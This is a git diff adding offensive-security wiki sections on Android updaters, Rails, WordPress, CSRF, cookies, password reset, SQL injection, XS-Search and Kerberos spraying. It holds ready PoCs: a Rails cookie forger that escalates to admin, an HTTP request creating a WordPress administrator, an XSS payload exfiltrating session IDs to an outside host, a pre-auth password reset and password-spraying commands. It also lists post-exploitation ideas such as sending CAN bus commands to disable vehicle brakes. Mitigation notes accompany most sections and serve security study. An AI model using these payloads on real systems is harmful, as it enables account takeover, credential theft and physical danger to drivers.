Also consider stubbing vendor methods such as `PluginVerifier.verifySignature()`, `checkHash()`, or shortcircuiting update gating logic in Java or JNI.
---
## 5. Other attack surfaces in updaters (20232025)
- Zip Slip path traversal while extracting plugins: malicious entries like `../../../../data/data/<pkg>/files/target` overwrite arbitrary files. Always sanitize entry paths and use allowlists.
- External storage staging: if the app writes the archive to external storage before loading, any other app can tamper with it. Scoped Storage or internal app storage avoids this.
- Cleartext downloads: metadata over HTTPS but payload over HTTP → straightforward MITM swap.
- Incomplete signature checks: comparing only a single file hash, not the whole archive; not binding signature to developer key; accepting any RSA key present in the archive.
- React Native / Web-based OTA content: if native bridges execute JS from OTA without strict signing, arbitrary code execution in the app context is possible (e.g., insecure CodePush-like flows). Ensure detached update signing and strict verification.
---
## 6. Post-Exploitation Ideas
- Steal session cookies, OAuth tokens, or JWTs stored by the app.
- Drop a second-stage APK and silently install it via `pm install` if possible (some apps already declare `REQUEST_INSTALL_PACKAGES`).
- Abuse any connected hardware in the AnyScan scenario you can send arbitrary OBDII / CAN bus commands (unlock doors, disable ABS, etc.).
---
### Detection & Mitigation Checklist (blue team)
* NEVER ship a production build with a custom TrustManager/HostnameVerifier that disables certificate validation.
* Do not download executable code from outside Google Play. If you *must*, sign each plugin with the same **apkSigning v2** key and verify the signature before loading.
* Replace weak/hard-coded crypto with **AES-GCM** and a server-side rotating key.
* Validate the integrity of downloaded archives (signature or at least SHA-256).
- Avoid dynamic code loading and outofstore updates. Prefer Playmediated updates. If dynamic plugins are a hard requirement, design them as dataonly bundles and keep executable code in the base APK.
- Enforce TLS properly: no custom trustall managers; deploy pinning where feasible and a hardened network security config that disallows cleartext traffic.
- Do not download executable code from outside Google Play. If you must, use detached update signing (e.g., Ed25519/RSA) with a developerheld key and verify before loading. Bind metadata and payload (length, hash, version) and fail closed.
- Use modern crypto (AESGCM) with permessage nonces for metadata; remove hardcoded keys from clients.
- Validate integrity of downloaded archives: verify a signature that covers every file, or at minimum verify a manifest of SHA256 hashes. Reject extra/unknown files.
- Store downloads in appinternal storage (or scoped storage on Android 10+) and use file permissions that prevent crossapp tampering.
- Defend against Zip Slip: normalize and validate zip entry paths before extraction; reject absolute paths or `..` segments.
- Consider Play “Code Transparency” to allow you and users to verify that shipped DEX/native code matches what you built (compliments but does not replace APK signing).
---
## References
- [NowSecure Remote Code Execution Discovered in Xtool AnyScan App](https://www.nowsecure.com/blog/2025/07/16/remote-code-execution-discovered-in-xtool-anyscan-app-risks-to-phones-and-vehicles/)
- [Android Unsafe TrustManager patterns](https://developer.android.com/privacy-and-security/risks/unsafe-trustmanager)
- [Android Developers Dynamic Code Loading (risks and mitigations)](https://developer.android.com/privacy-and-security/risks/dynamic-code-loading)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -6,7 +6,95 @@
As explained in [this article](https://www.offsec.com/blog/cve-2024-46986/), uploading a `.rb` file into sensitive directories such as `config/initializers/` can lead to remote code execution (RCE) in Ruby on Rails applications.
Tips:
- Other boot/eager-load locations that are executed on app start are also risky when writeable (e.g., `config/initializers/` is the classic one). If you find an arbitrary file upload that lands anywhere under `config/` and is later evaluated/required, you may obtain RCE at boot.
- Look for dev/staging builds that copy user-controlled files into the container image where Rails will load them on boot.
## Active Storage image transformation → command execution (CVE-2025-24293)
When an application uses Active Storage with `image_processing` + `mini_magick`, and passes untrusted parameters to image transformation methods, Rails versions prior to 7.1.5.2 / 7.2.2.2 / 8.0.2.1 could allow command injection because some transformation methods were mistakenly allowed by default.
- A vulnerable pattern looks like:
```erb
<%= image_tag blob.variant(params[:t] => params[:v]) %>
```
where `params[:t]` and/or `params[:v]` are attacker-controlled.
- What to try during testing
- Identify any endpoints that accept variant/processing options, transformation names, or arbitrary ImageMagick arguments.
- Fuzz `params[:t]` and `params[:v]` for suspicious errors or execution side-effects. If you can influence the method name or pass raw arguments that reach MiniMagick, you may get code exec on the image processor host.
- If you only have read-access to generated variants, attempt blind exfiltration via crafted ImageMagick operations.
- Remediation/detections
- If you see Rails < 7.1.5.2 / 7.2.2.2 / 8.0.2.1 with Active Storage + `image_processing` + `mini_magick` and user-controlled transformations, consider it exploitable. Recommend upgrading and enforcing strict allowlists for methods/params and a hardened ImageMagick policy.
## Rack::Static LFI / path traversal (CVE-2025-27610)
If the target stack uses Rack middleware directly or via frameworks, versions of `rack` prior to 2.2.13, 3.0.14, and 3.1.12 allow Local File Inclusion via `Rack::Static` when `:root` is unset/misconfigured. Encoded traversal in `PATH_INFO` can expose files under the process working directory or an unexpected root.
- Hunt for apps that mount `Rack::Static` in `config.ru` or middleware stacks. Try encoded traversals against static paths, for example:
```text
GET /assets/%2e%2e/%2e%2e/config/database.yml
GET /favicon.ico/..%2f..%2f.env
```
Adjust the prefix to match configured `urls:`. If the app responds with file contents, you likely have LFI to anything under the resolved `:root`.
- Mitigation: upgrade Rack; ensure `:root` only points to a directory of public files and is explicitly set.
## Forging/decrypting Rails cookies when `secret_key_base` is leaked
Rails encrypts and signs cookies using keys derived from `secret_key_base`. If that value leaks (e.g., in a repo, logs, or misconfigured credentials), you can usually decrypt, modify, and re-encrypt cookies. This often leads to authz bypass if the app stores roles, user IDs, or feature flags in cookies.
Minimal Ruby to decrypt and re-encrypt modern cookies (AES-256-GCM, default in recent Rails):
```ruby
require 'cgi'
require 'json'
require 'active_support'
require 'active_support/message_encryptor'
require 'active_support/key_generator'
secret_key_base = ENV.fetch('SECRET_KEY_BASE_LEAKED')
raw_cookie = CGI.unescape(ARGV[0])
salt = 'authenticated encrypted cookie'
cipher = 'aes-256-gcm'
key_len = ActiveSupport::MessageEncryptor.key_len(cipher)
secret = ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000).generate_key(salt, key_len)
enc = ActiveSupport::MessageEncryptor.new(secret, cipher: cipher, serializer: JSON)
plain = enc.decrypt_and_verify(raw_cookie)
puts "Decrypted: #{plain.inspect}"
# Modify and re-encrypt (example: escalate role)
plain['role'] = 'admin' if plain.is_a?(Hash)
forged = enc.encrypt_and_sign(plain)
puts "Forged cookie: #{CGI.escape(forged)}"
```
Notes:
- Older apps may use AES-256-CBC and salts `encrypted cookie` / `signed encrypted cookie`, or JSON/Marshal serializers. Adjust salts, cipher, and serializer accordingly.
- On compromise/assessment, rotate `secret_key_base` to invalidate all existing cookies.
## See also (Ruby/Rails-specific vulns)
- Ruby deserialization and class pollution:
{{#ref}}
../../pentesting-web/deserialization/README.md
{{#endref}}
{{#ref}}
../../pentesting-web/deserialization/ruby-class-pollution.md
{{#endref}}
{{#ref}}
../../pentesting-web/deserialization/ruby-_json-pollution.md
{{#endref}}
- Template injection in Ruby engines (ERB/Haml/Slim, etc.):
{{#ref}}
../../pentesting-web/ssti-server-side-template-injection/README.md
{{#endref}}
## References
- Rails Security Announcement: CVE-2025-24293 Active Storage unsafe transformation methods (fixed in 7.1.5.2 / 7.2.2.2 / 8.0.2.1). https://discuss.rubyonrails.org/t/cve-2025-24293-active-storage-allowed-transformation-methods-potentially-unsafe/89670
- GitHub Advisory: Rack::Static Local File Inclusion (CVE-2025-27610). https://github.com/advisories/GHSA-7wqh-767x-r66v
{{#include ../../banners/hacktricks-training.md}}

View File

@ -409,6 +409,53 @@ The `permission_callback` is a callback to function that checks if a given user
Of course, Wordpress uses PHP and files inside plugins are directly accessible from the web. So, in case a plugin is exposing any vulnerable functionality that is triggered just accessing the file, it's going to be exploitable by any user.
### Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1)
Some plugins implement “trusted header” shortcuts for internal integrations or reverse proxies and then use that header to set the current user context for REST requests. If the header is not cryptographically bound to the request by an upstream component, an attacker can spoof it and hit privileged REST routes as an administrator.
- Impact: unauthenticated privilege escalation to admin by creating a new administrator via the core users REST route.
- Example header: `X-Wcpay-Platform-Checkout-User: 1` (forces user ID 1, typically the first administrator account).
- Exploited route: `POST /wp-json/wp/v2/users` with an elevated role array.
PoC
```http
POST /wp-json/wp/v2/users HTTP/1.1
Host: <WP HOST>
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
X-Wcpay-Platform-Checkout-User: 1
Content-Length: 114
{"username": "honeypot", "email": "wafdemo@patch.stack", "password": "demo", "roles": ["administrator"]}
```
Why it works
- The plugin maps a client-controlled header to authentication state and skips capability checks.
- WordPress core expects `create_users` capability for this route; the plugin hack bypasses it by directly setting the current user context from the header.
Expected success indicators
- HTTP 201 with a JSON body describing the created user.
- A new admin user visible in `wp-admin/users.php`.
Detection checklist
- Grep for `getallheaders()`, `$_SERVER['HTTP_...']`, or vendor SDKs that read custom headers to set user context (e.g., `wp_set_current_user()`, `wp_set_auth_cookie()`).
- Review REST registrations for privileged callbacks that lack robust `permission_callback` checks and instead rely on request headers.
- Look for usages of core user-management functions (`wp_insert_user`, `wp_create_user`) inside REST handlers that are gated only by header values.
Hardening
- Never derive authentication or authorization from client-controlled headers.
- If a reverse proxy must inject identity, terminate trust at the proxy and strip inbound copies (e.g., `unset X-Wcpay-Platform-Checkout-User` at the edge), then pass a signed token and verify it server-side.
- For REST routes performing privileged actions, require `current_user_can()` checks and a strict `permission_callback` (do NOT use `__return_true`).
- Prefer first-party auth (cookies, application passwords, OAuth) over header “impersonation”.
References: see the links at the end of this page for a public case and broader analysis.
### Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0)
WordPress themes and plugins frequently expose AJAX handlers through the `wp_ajax_` and `wp_ajax_nopriv_` hooks. When the **_nopriv_** variant is used **the callback becomes reachable by unauthenticated visitors**, so any sensitive action must additionally implement:
@ -561,6 +608,21 @@ add_action( 'profile_update', function( $user_id ) {
---
### WAF considerations for WordPress/plugin CVEs
Generic edge/server WAFs are tuned for broad patterns (SQLi, XSS, LFI). Many highimpact WordPress/plugin flaws are application-specific logic/auth bugs that look like benign traffic unless the engine understands WordPress routes and plugin semantics.
Offensive notes
- Target plugin-specific endpoints with clean payloads: `admin-ajax.php?action=...`, `wp-json/<namespace>/<route>`, custom file handlers, shortcodes.
- Exercise unauth paths first (AJAX `nopriv`, REST with permissive `permission_callback`, public shortcodes). Default payloads often succeed without obfuscation.
- Typical high-impact cases: privilege escalation (broken access control), arbitrary file upload/download, LFI, open redirect.
Defensive notes
- Dont rely on generic WAF signatures to protect plugin CVEs. Implement application-layer, vulnerability-specific virtual patches or update quickly.
- Prefer positive-security checks in code (capabilities, nonces, strict input validation) over negative regex filters.
## WordPress Protection
### Regular Updates
@ -657,5 +719,8 @@ The server responds with the contents of `wp-config.php`, leaking DB credentials
- [Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin](https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wp-job-portal-plugin/)
- [Rare Case of Privilege Escalation in ASE Plugin Affecting 100k+ Sites](https://patchstack.com/articles/rare-case-of-privilege-escalation-in-ase-plugin-affecting-100k-sites/)
- [ASE 7.6.3 changeset delete original roles on profile update](https://plugins.trac.wordpress.org/changeset/3211945/admin-site-enhancements/tags/7.6.3/classes/class-view-admin-as-role.php?old=3208295&old_path=admin-site-enhancements%2Ftags%2F7.6.2%2Fclasses%2Fclass-view-admin-as-role.php)
- [Hosting security tested: 87.8% of vulnerability exploits bypassed hosting defenses](https://patchstack.com/articles/hosting-security-tested-87-percent-of-vulnerability-exploits-bypassed-hosting-defenses/)
- [WooCommerce Payments ≤ 5.6.1 Unauth privilege escalation via trusted header (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/woocommerce-payments/vulnerability/wordpress-woocommerce-payments-plugin-5-6-1-unauthenticated-privilege-escalation-vulnerability)
- [Hackers exploiting critical WordPress WooCommerce Payments bug](https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -293,3 +293,4 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
{{#include ../../banners/hacktricks-training.md}}

View File

@ -37,9 +37,39 @@ Understanding and implementing these defenses is crucial for maintaining the sec
## Defences Bypass
### From POST to GET
### From POST to GET (method-conditioned CSRF validation bypass)
Maybe the form you want to abuse is prepared to send a **POST request with a CSRF token but**, you should **check** if a **GET** is also **valid** and if when you send a GET request the **CSRF token is still being validated**.
Some applications only enforce CSRF validation on POST while skipping it for other verbs. A common anti-pattern in PHP looks like:
```php
public function csrf_check($fatal = true) {
if ($_SERVER['REQUEST_METHOD'] !== 'POST') return true; // GET, HEAD, etc. bypass CSRF
// ... validate __csrf_token here ...
}
```
If the vulnerable endpoint also accepts parameters from $_REQUEST, you can reissue the same action as a GET request and omit the CSRF token entirely. This converts a POST-only action into a GET action that succeeds without a token.
Example:
- Original POST with token (intended):
```http
POST /index.php?module=Home&action=HomeAjax&file=HomeWidgetBlockList HTTP/1.1
Content-Type: application/x-www-form-urlencoded
__csrf_token=sid:...&widgetInfoList=[{"widgetId":"https://attacker<img src onerror=alert(1)>","widgetType":"URL"}]
```
- Bypass by switching to GET (no token):
```http
GET /index.php?module=Home&action=HomeAjax&file=HomeWidgetBlockList&widgetInfoList=[{"widgetId":"https://attacker<img+src+onerror=alert(1)>","widgetType":"URL"}] HTTP/1.1
```
Notes:
- This pattern frequently appears alongside reflected XSS where responses are incorrectly served as text/html instead of application/json.
- Pairing this with XSS greatly lowers exploitation barriers because you can deliver a single GET link that both triggers the vulnerable code path and avoids CSRF checks entirely.
### Lack of token
@ -684,9 +714,6 @@ with open(PASS_LIST, "r") as f:
- [https://portswigger.net/web-security/csrf/bypassing-token-validation](https://portswigger.net/web-security/csrf/bypassing-token-validation)
- [https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses](https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses)
- [https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html](https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html)
- [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
{{#include ../banners/hacktricks-training.md}}

View File

@ -1097,6 +1097,7 @@ Treat any path where untrusted bytes reach `Marshal.load`/`marshal_load` as an R
- Minimal vulnerable Rails code path:
```ruby
class UserRestoreController < ApplicationController
def show

View File

@ -691,7 +691,7 @@ lfi2rce-via-temp-file-uploads.md
### Via `pearcmd.php` + URL args
As [**explained in this post**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), the script `/usr/local/lib/phppearcmd.php` exists by default in php docker images. Moreover, it's possible to pass arguments to the script via the URL because it's indicated that if a URL param doesn't have an `=`, it should be used as an argument.
As [**explained in this post**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), the script `/usr/local/lib/phppearcmd.php` exists by default in php docker images. Moreover, it's possible to pass arguments to the script via the URL because it's indicated that if a URL param doesn't have an `=`, it should be used as an argument. See also [watchTowrs write-up](https://labs.watchtowr.com/form-tools-we-need-to-talk-about-php/) and [Orange Tsais “Confusion Attacks”](https://blog.orange.tw/posts/2024-08-confusion-attacks-en/).
The following request create a file in `/tmp/hello.php` with the content `<?=phpinfo()?>`:
@ -750,6 +750,9 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
- [PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders)
- [Horizon3.ai From Support Ticket to Zero Day (FreeFlow Core path traversal → arbitrary write → webshell)](https://horizon3.ai/attack-research/attack-blogs/from-support-ticket-to-zero-day/)
- [Xerox Security Bulletin 025-013 FreeFlow Core 8.0.5](https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Security-Bulletin-025-013-for-Freeflow-Core-8.0.5.pdf)
- [watchTowr We need to talk about PHP (pearcmd.php gadget)](https://labs.watchtowr.com/form-tools-we-need-to-talk-about-php/)
- [Orange Tsai Confusion Attacks on Apache](https://blog.orange.tw/posts/2024-08-confusion-attacks-en/)
- [VTENEXT 25.02 a three-way path to RCE](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
{{#file}}
EN-Local-File-Inclusion-1.pdf

View File

@ -70,6 +70,15 @@ cookie-jar-overflow.md
{{#endref}}
- It's possible to use [**Cookie Smuggling**](#cookie-smuggling) attack to exfiltrate these cookies
- If any server-side endpoint echoes the raw session ID in the HTTP response (e.g., inside HTML comments or a debug block), you can bypass HttpOnly by using an XSS gadget to fetch that endpoint, regex the secret, and exfiltrate it. Example XSS payload pattern:
```js
// Extract content between <!-- startscrmprint --> ... <!-- stopscrmprint -->
const re = /<!-- startscrmprint -->([\s\S]*?)<!-- stopscrmprint -->/;
fetch('/index.php?module=Touch&action=ws')
.then(r => r.text())
.then(t => { const m = re.exec(t); if (m) fetch('https://collab/leak', {method:'POST', body: JSON.stringify({leak: btoa(m[1])})}); });
```
### Secure
@ -327,7 +336,9 @@ There should be a pattern (with the size of a used block). So, knowing how are a
- [https://blog.ankursundara.com/cookie-bugs/](https://blog.ankursundara.com/cookie-bugs/)
- [https://www.linkedin.com/posts/rickey-martin-24533653_100daysofhacking-penetrationtester-ethicalhacking-activity-7016286424526180352-bwDd](https://www.linkedin.com/posts/rickey-martin-24533653_100daysofhacking-penetrationtester-ethicalhacking-activity-7016286424526180352-bwDd)
- [https://portswigger.net/research/bypassing-wafs-with-the-phantom-version-cookie](https://portswigger.net/research/bypassing-wafs-with-the-phantom-version-cookie)
- [https://seclists.org/webappsec/2006/q2/181](https://seclists.org/webappsec/2006/q2/181)
- [https://www.michalspacek.com/stealing-session-ids-with-phpinfo-and-how-to-stop-it](https://www.michalspacek.com/stealing-session-ids-with-phpinfo-and-how-to-stop-it)
- [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -881,4 +881,3 @@ def handleResponse(req, interesting):
{{#include ../../banners/hacktricks-training.md}}

View File

@ -143,9 +143,10 @@ Practical use cases:
This pairs well with header-reflection cache poisoning. See:
- {{#ref}}
{{#ref}}
cache-deception/README.md
{{#endref}}
- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)
### Obfuscation <a href="#ip-rotation" id="ip-rotation"></a>
@ -245,4 +246,3 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascri
{{#include ../banners/hacktricks-training.md}}

View File

@ -247,10 +247,50 @@ uuid-insecurities.md
print("[+] Attck stopped")
```
## Arbitrary password reset via skipOldPwdCheck (pre-auth)
Some implementations expose a password change action that calls the password-change routine with skipOldPwdCheck=true and does not verify any reset token or ownership. If the endpoint accepts an action parameter like change_password and a username/new password in the request body, an attacker can reset arbitrary accounts pre-auth.
Vulnerable pattern (PHP):
```php
// hub/rpwd.php
RequestHandler::validateCSRFToken();
$RP = new RecoverPwd();
$RP->process($_REQUEST, $_POST);
// modules/Users/RecoverPwd.php
if ($request['action'] == 'change_password') {
$body = $this->displayChangePwd($smarty, $post['user_name'], $post['confirm_new_password']);
}
public function displayChangePwd($smarty, $username, $newpwd) {
$current_user = CRMEntity::getInstance('Users');
$current_user->id = $current_user->retrieve_user_id($username);
// ... criteria checks omitted ...
$current_user->change_password('oldpwd', $_POST['confirm_new_password'], true, true); // skipOldPwdCheck=true
emptyUserAuthtokenKey($this->user_auth_token_type, $current_user->id);
}
```
Exploitation request (concept):
```http
POST /hub/rpwd.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=change_password&user_name=admin&confirm_new_password=NewP@ssw0rd!
```
Mitigations:
- Always require a valid, time-bound reset token bound to the account and session before changing a password.
- Never expose skipOldPwdCheck paths to unauthenticated users; enforce authentication for regular password changes and verify the old password.
- Invalidate all active sessions and reset tokens after a password change.
## References
- [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token)
- [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
{{#include ../banners/hacktricks-training.md}}

View File

@ -621,6 +621,37 @@ Or using a **comma bypass**:
This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/](https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/)
### Column/tablename injection in SELECT list via subqueries
If user input is concatenated into the SELECT list or table/column identifiers, prepared statements wont help because bind parameters only protect values, not identifiers. A common vulnerable pattern is:
```php
// Pseudocode
$fieldname = $_REQUEST['fieldname']; // attacker-controlled
$tablename = $modInstance->table_name; // sometimes also attacker-influenced
$q = "SELECT $fieldname FROM $tablename WHERE id=?"; // id is the only bound param
$stmt = $db->pquery($q, [$rec_id]);
```
Exploitation idea: inject a subquery into the field position to exfiltrate arbitrary data:
```sql
-- Legit
SELECT user_name FROM vte_users WHERE id=1;
-- Injected subquery to extract a sensitive value (e.g., password reset token)
SELECT (SELECT token FROM vte_userauthtoken WHERE userid=1) FROM vte_users WHERE id=1;
```
Notes:
- This works even when the WHERE clause uses a bound parameter, because the identifier list is still string-concatenated.
- Some stacks additionally let you control the table name (tablename injection), enabling cross-table reads.
- Output sinks may reflect the selected value into HTML/JSON, allowing XSS or token exfiltration directly from the response.
Mitigations:
- Never concatenate identifiers from user input. Map allowed column names to a fixed allow-list and quote identifiers properly.
- If dynamic table access is required, restrict to a finite set and resolve server-side from a safe mapping.
### WAF bypass suggester tools
@ -640,5 +671,8 @@ https://github.com/m4ll0k/Atlas
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt
{{#endref}}
## References
- [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -2,7 +2,24 @@
{{#include ../../banners/hacktricks-training.md}}
The following **script** taken from [**here**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) is exploiting a functionality that allows the user to **insert any amount of cookies**, and then loading a file as a script knowing that the true response will be larger than the false one and then. If successful, the response is a redirect with a resulting URL longer, **too large to handle by the server so return an error http status code**. If the search fails, nothing will happen because URL is short.
This technique combines:
- Cookie bombing: stuffing the victims browser with many/large cookies for the target origin so that subsequent requests hit server/request limits (request header size, URL size in redirects, etc.).
- Error-event oracle: probing a cross-origin endpoint with a <script> (or other subresource) and distinguishing states with onload vs onerror.
High level idea
- Find a target endpoint whose behavior differs for two states you want to test (e.g., search “hit” vs “miss”).
- Ensure the “hit” path will trigger a heavy redirect chain or long URL while the “miss” path stays short. Inflate request headers using many cookies so that only the “hit” path causes the server to fail with an HTTP error (e.g., 431/414/400). The error flips the onerror event and becomes an oracle for XS-Search.
When does this work
- You can cause the victim browser to send cookies to the target (e.g., cookies are SameSite=None or you can set them in a first-party context via a popup window.open).
- There is an app feature you can abuse to set arbitrary cookies (e.g., “save preference” endpoints that turn controlled input names/values into Set-Cookie) or to make post-auth redirects that incorporate attacker-controlled data into the URL.
- The server reacts differently on the two states and, with inflated headers/URL, one state crosses a limit and returns an error response that triggers onerror.
Note on server errors used as the oracle
- 431 Request Header Fields Too Large is commonly returned when cookies inflate request headers; 414 URI Too Long or a server-specific 400 may be returned for long request targets. Any of these result in a failed subresource load and fire onerror. [MDN documents 431 and typical causes like excessive cookies.]()
Practical example (angstromCTF 2022)
The following script (from a public writeup) abuses a feature that lets the attacker insert arbitrary cookies, then loads a cross-origin search endpoint as a script. When the query is correct, the server performs a redirect that, together with the cookie bloat, exceeds server limits and returns an error status, so script.onerror fires; otherwise nothing happens.
```html
<>'";
@ -59,7 +76,55 @@ The following **script** taken from [**here**](https://blog.huli.tw/2022/05/05/e
</script>
```
Why the popup (window.open)?
- Modern browsers increasingly block third-party cookies. Opening a top-level window to the target makes cookies firstparty so Set-Cookie responses from the target will stick, enabling the cookie-bomb step even with thirdparty cookie restrictions.
Generic probing helper
If you already have a way to set many cookies on the target origin (first-party), you can reuse this minimal oracle against any endpoint whose success/failure leads to different network outcomes (status/MIME/redirect):
```js
function probeError(url) {
return new Promise((resolve) => {
const s = document.createElement('script');
s.src = url;
s.onload = () => resolve(false); // loaded successfully
s.onerror = () => resolve(true); // failed (e.g., 4xx/5xx, wrong MIME, blocked)
document.head.appendChild(s);
});
}
```
Tips to build the oracle
- Force the “positive” state to be heavier: chain an extra redirect only when the predicate is true, or make the redirect URL reflect unbounded user input so it grows with the guessed prefix.
- Inflate headers: repeat cookie bombing until a consistent error is observed on the “heavy” path. Servers commonly cap header size and will fail sooner when many cookies are present.
- Stabilize: fire multiple parallel cookie set operations and probe repeatedly to average out timing and caching noise.
Related XS-Search tricks
- URL length based oracles (no cookies needed) can be combined or used instead when you can force a very long request target:
{{#ref}}
url-max-length-client-side.md
{{#endref}}
Defenses and hardening
- Make success/failure responses indistinguishable:
- Avoid conditional redirects or large differences in response size between states. Return the same status, same content type, and similar body length regardless of state.
- Block cross-site subresource probes:
- SameSite cookies: set sensitive cookies to SameSite=Lax or Strict so subresource requests like <script src> dont carry them; prefer Strict for auth tokens when possible.
- Fetch Metadata: enforce a Resource Isolation Policy to reject cross-site subresource loads (e.g., if Sec-Fetch-Site != same-origin/same-site).
- Cross-Origin-Resource-Policy (CORP): set CORP: same-origin (or at least same-site) for endpoints not meant to be embedded as cross-origin subresources.
- X-Content-Type-Options: nosniff and correct Content-Type on JSON/HTML endpoints to avoid load-as-script quirks.
- Reduce header/URL amplification:
- Cap the number/size of cookies set; sanitize features that turn arbitrary form fields into Set-Cookie.
- Normalize or truncate reflected data in redirects; avoid embedding attacker-controlled long strings in Location URLs.
- Keep server limits consistent and fail uniformly (avoid special error pages only for one branch).
Notes
- This class of attacks is discussed broadly as “Error Events” XS-Leaks. The cookie-bomb step is just a convenient way to push only one branch over server limits, producing a reliable boolean oracle.
## References
- XS-Leaks: Error Events (onerror/onload as an oracle): https://xsleaks.dev/docs/attacks/error-events/
- MDN: 431 Request Header Fields Too Large (common with many cookies): https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/431
{{#include ../../banners/hacktricks-training.md}}

View File

@ -109,6 +109,81 @@ Invoke-SprayEmptyPassword
legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org
```
### Kerberos pre-auth spraying with LDAP targeting and PSO-aware throttling (SpearSpray)
Kerberos pre-authbased spraying reduces noise vs SMB/NTLM/LDAP bind attempts and aligns better with AD lockout policies. SpearSpray couples LDAP-driven targeting, a pattern engine, and policy awareness (domain policy + PSOs + badPwdCount buffer) to spray precisely and safely. It can also tag compromised principals in Neo4j for BloodHound pathing.
Key ideas:
- LDAP user discovery with paging and LDAPS support, optionally using custom LDAP filters.
- Domain lockout policy + PSO-aware filtering to leave a configurable attempt buffer (threshold) and avoid locking users.
- Kerberos pre-auth validation using fast gssapi bindings (generates 4768/4771 on DCs instead of 4625).
- Pattern-based, per-user password generation using variables like names and temporal values derived from each users pwdLastSet.
- Throughput control with threads, jitter, and max requests per second.
- Optional Neo4j integration to mark owned users for BloodHound.
Basic usage and discovery:
```bash
# List available pattern variables
spearspray -l
# Basic run (LDAP bind over TCP/389)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# LDAPS (TCP/636)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --ssl
```
Targeting and pattern control:
```bash
# Custom LDAP filter (e.g., target specific OU/attributes)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local \
-q "(&(objectCategory=person)(objectClass=user)(department=IT))"
# Use separators/suffixes and an org token consumed by patterns via {separator}/{suffix}/{extra}
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -sep @-_ -suf !? -x ACME
```
Stealth and safety controls:
```bash
# Control concurrency, add jitter, and cap request rate
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -t 5 -j 3,5 --max-rps 10
# Leave N attempts in reserve before lockout (default threshold: 2)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -thr 2
```
Neo4j/BloodHound enrichment:
```bash
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound --uri bolt://localhost:7687
```
Pattern system overview (patterns.txt):
```text
# Example templates consuming per-user attributes and temporal context
{name}{separator}{year}{suffix}
{month_en}{separator}{short_year}{suffix}
{season_en}{separator}{year}{suffix}
{samaccountname}
{extra}{separator}{year}{suffix}
```
Available variables include:
- {name}, {samaccountname}
- Temporal from each users pwdLastSet (or whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Composition helpers and org token: {separator}, {suffix}, {extra}
Operational notes:
- Favor querying the PDC-emulator with -dc to read the most authoritative badPwdCount and policy-related info.
- badPwdCount resets are triggered on the next attempt after the observation window; use threshold and timing to stay safe.
- Kerberos pre-auth attempts surface as 4768/4771 in DC telemetry; use jitter and rate-limiting to blend in.
> Tip: SpearSprays default LDAP page size is 200; adjust with -lps as needed.
## Outlook Web Access
There are multiples tools for p**assword spraying outlook**.
@ -142,6 +217,11 @@ To use any of these tools, you need a user list and a password / a small list of
## References
- [https://github.com/sikumy/spearspray](https://github.com/sikumy/spearspray)
- [https://github.com/TarlogicSecurity/kerbrute](https://github.com/TarlogicSecurity/kerbrute)
- [https://github.com/Greenwolf/Spray](https://github.com/Greenwolf/Spray)
